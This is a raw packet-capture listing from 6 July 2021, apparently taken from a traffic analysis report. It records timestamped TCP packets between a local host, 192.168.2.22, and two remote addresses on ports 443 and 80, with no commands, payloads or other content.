                                                                                                                                                                                                              Jul 6, 2021 15:34:18.059163094 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.059281111 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.059309006 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.060895920 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.060926914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.061008930 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063296080 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063328981 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063350916 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063371897 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063396931 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063431025 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063431978 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063455105 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.063493013 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.064630032 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148772001 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148816109 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148838997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148863077 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148921013 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.148955107 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152347088 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152381897 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152405024 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152426958 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152451992 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152475119 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152507067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.152538061 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.158066988 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.158116102 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.158139944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.158154964 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.158202887 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.238730907 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.238771915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.238790035 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.238812923 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.238898039 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.240798950 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.240833044 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.240855932 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.240906000 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243078947 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243105888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243139029 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243161917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243182898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243222952 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.243256092 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.244906902 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.244930029 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.244995117 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.328959942 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.328985929 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.328999043 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.329011917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.329166889 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332294941 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332319021 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332336903 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332351923 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332369089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332386017 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332397938 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.332427979 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.337162971 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.337187052 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.337203026 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.337213993 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.337287903 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420476913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420505047 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420522928 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420542955 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420561075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420578003 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420644045 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.420686007 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423801899 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423825026 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423837900 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423854113 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423870087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423888922 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.423964977 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.424921989 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.424942970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.425121069 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510879993 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510915995 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510930061 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510942936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510956049 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.510967970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.511149883 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514244080 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514271975 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514283895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514296055 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514308929 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514324903 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514373064 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.514403105 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.515424967 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.515439987 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.515496016 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.599504948 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.599567890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.599711895 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.599992037 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.600034952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.600086927 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.601661921 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.601717949 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.601789951 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.602713108 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.602756023 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.602821112 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.603502989 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.603570938 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.603632927 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606497049 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606594086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606664896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606676102 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606733084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606771946 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606893063 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.606944084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.607001066 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.608103037 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.608171940 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.608232975 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.608941078 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.609196901 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.609255075 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.610110998 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.610141039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.610194921 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.611267090 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.611293077 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.611362934 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.612556934 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.612582922 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.612647057 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.616573095 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691519976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691545963 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691562891 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691579103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691617012 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691647053 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691746950 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691766024 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.691802979 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.692797899 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.692820072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.692882061 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.694000959 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.694024086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.694097042 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.695198059 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.695219040 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.695280075 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.696042061 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.696058035 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.696119070 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.780915976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.780944109 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.780961037 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.780977964 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.781035900 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783648014 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783677101 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783703089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783724070 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783729076 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.783741951 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.784377098 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.784396887 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.784437895 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.785557985 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.785597086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.785646915 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.788705111 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.788733959 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.788805008 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.871300936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.871354103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.871375084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.871401072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.871516943 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.872797012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.872836113 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.872946978 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875217915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875251055 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875266075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875304937 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875345945 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875364065 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875370979 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.875396967 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878505945 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878534079 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878552914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878568888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878586054 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878604889 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878604889 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878639936 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.878644943 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881025076 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881074905 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881114006 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881134987 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881156921 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.881192923 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885049105 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885080099 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885092974 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885104895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885113955 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.885224104 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962114096 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962160110 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962182999 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962205887 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962213039 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.962255955 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964641094 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964680910 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964705944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964729071 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964751959 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964766026 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964776039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964803934 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:18.964807987 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.207704067 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.245826006 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.245974064 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.246521950 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.285829067 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.831310987 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.831341028 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.831489086 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.569282055 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.607819080 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.607933044 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.615902901 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.654313087 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.654344082 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.654362917 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.654380083 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.654490948 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.657012939 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.657035112 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.657105923 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.664293051 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.702476978 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.702967882 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.903498888 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.084635973 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.126208067 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234801054 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234838009 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234860897 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234884977 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234946966 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.234977007 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.324752092 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.324790001 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.325032949 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.325475931 CEST4434917213.224.92.73192.168.2.22
